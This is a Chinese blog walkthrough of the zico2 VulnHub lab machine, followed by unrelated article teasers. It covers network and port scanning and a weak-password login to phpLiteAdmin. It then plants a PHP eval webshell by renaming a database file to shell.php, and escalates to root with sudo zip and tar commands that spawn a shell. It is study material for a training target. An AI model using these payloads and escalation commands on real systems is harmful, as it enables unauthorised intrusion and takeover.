zico2打靶记录

embedded/2024/12/23 13:59:49/

一、环境搭建

下载地址:https://download.vulnhub.com/zico/zico2.ova

直接双击下载的.ova文件即可在VMware中打开

设置好保存路径后在虚拟机的设置中删除仅主机这个网卡

然后启动靶机

二、信息收集

扫描靶机ip

arp-scan -l

扫描一下开放的端口

nmap -p- -sV -A 192.168.228.129

可以看到一共开放了22,80,111端口

扫描下目录

dirb http://192.168.228.129

访问网站

寻找功能点

测试发现一个文件包含点

再查看网站的目录

里面只有一个php文件点击访问看看

看起来确实是一个叫做phpLiteAdmin的登陆界面,简单试试弱口令发现admin登陆成功

应该是一个数据库管理后台,一番寻找后在这里找到了数据

发现了root和zico的用户名和密码,但密码是被加密了,看一下密码的特征是32位长度的16进制字符串,很明显是md5加密,去网上破解一下试试

root用户的密码是34kroot34

zico用户的密码是zico2215@

ssh连接发现都无法连接、

三、Getshell

我们回到phpLiteAdmin管理页面,既然已经拿到数据库后台,是否可以直接写入一句话木马进而getshell呢?

首先随便创建一个数据库名字叫做shell_db

然后在该库中创建一个名为shell_table的表,后面的字段数无所谓

随便设置一个字段名称,我这里设为shell,类型为text

点击insert

写入我们的一句话木马

<?php phpinfo();@eval($_POST['cmd']);?>

写入成功

完成后我们还无法访问这个一句话木马,因为数据库文件的默认存放位置是 /usr/databases/,在该目录中的文件是无法直接访问到的,所以我们需要通过改名来移动文件到可以访问的位置。

这里看到原来的位置为 /usr/databases/shell_db ,这里需要把绝对路径改为相对路径,也就是网站的根目录下,我们直接改为 shell.php。

然后再次访问http://192.168.228.129/dbadmin/ ,发现此时多了我们创建的shell.php这个文件

点击这个文件发现木马上传成功

然后就可以使用蚁剑连接

成功Getshell

四、权限提升

可以读取文件后,我们去找找有没有泄露的敏感信息,最终在 /home/zico/wordpress/wp-config.php,这个文件中找到了 zico 用户的ssh密码 sWfCsfJSPV9H3AmQzw8

尝试登陆,发现成功

ssh zico@192.168.228.129
sWfCsfJSPV9H3AmQzw8

发现可以sudo提权

sudo -l

这里发现可以执行root权限的有tar和zip

zip提权

sudo zip /tmp/1.zip /home/zico/to_do.txt -T --unzip-command="sh -c /bin/bash"

tar提权

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

提权成功


http://www.ppmy.cn/embedded/120159.html

相关文章

生产环境升级mysql流程及配置主从服务

之前写到过mysql升级8.4的文章, 因此不再介绍mysql的安装过程 避免服务器安装多个mysql引起冲突的安装方法_安装两个mysql会冲突吗-CSDN博客 生产环境升级mysql8.4.x流程 安装mysql 参考之前文章: 避免服务器安装多个mysql引起冲突的安装方法_安装两个mysql会冲突吗-CSDN博客…

dig和nmap的区别

dig和nmap是两种在网络管理和安全领域广泛使用的工具&#xff0c;它们在功能、用途和原理上存在显著差异。 dig 定义与功能&#xff1a; dig&#xff08;Domain Information Groper&#xff09;是一个用于查询DNS&#xff08;域名系统&#xff09;信息的命令行工具。它允许用…

《Linux从小白到高手》理论篇(六):Linux软件安装一篇通

List item 本篇介绍Linux软件安装相关的操作命令&#xff0c;看完本文&#xff0c;有关Linux软件安装相关操作的常用命令你就掌握了99%了。 Linux软件安装 RPM RPM软件的安装、删除、更新只有root权限才能使用&#xff1b;查询功能任何用户都可以操作&#xff1b;如果普通用…

技术周刊 | Express.js 5.0、Meta Connect 2024、字节发布两款视频生成大模型、OpenAI CEO 发长文预测超级人工智能

有个自己的“秘密项目”&#xff0c;做个 maker&#xff0c;持续创造&#xff0c;才是这个时代的成长策略。 大家好&#xff0c;我是童欧巴&#xff0c;欢迎来到第 129 期技术周刊。 资讯 Express.js v5.0 Express 这次升级像是终于扔掉了那只老旧的翻盖手机&#xff0c;换上…

【d56】【sql】完成sql 7题目

... 有一题感觉没意义&#xff0c;直接不刷

智慧城市交通管理中的云端多车调度与控制

城市交通管理中的云端多车调度与控制 智慧城市是 21世纪的城市基本发展方向&#xff0c;为了实现智慧城市建设的目标&#xff0c;人们需要用现代化的手段去管理和控制城市中的各种资源和设施。智能交通控制与管理是智慧城市中不可缺少的一部分&#xff0c;因为现代城市交通系统…

Spring Cloud全解析:服务调用之多个FeignClient调用服务名称相同

文章目录 name相同问题 name相同问题 在使用FeignClient的时候&#xff0c;发现多个FeignClient中的name相同就无法启动&#xff0c;当然了&#xff0c;这是因为bean名称重复了&#xff0c;创建bean的时候报的错&#xff0c;但是如何解决呢? A bean with that name has alrea…

vue3路由

使用 定义组件 新建components文件夹&#xff0c;新建About、News、Home组件 Home组件 <template><div class"home"><img src"http://www.atguigu.com/images/index_new/logo.png" alt""></div></template>&l…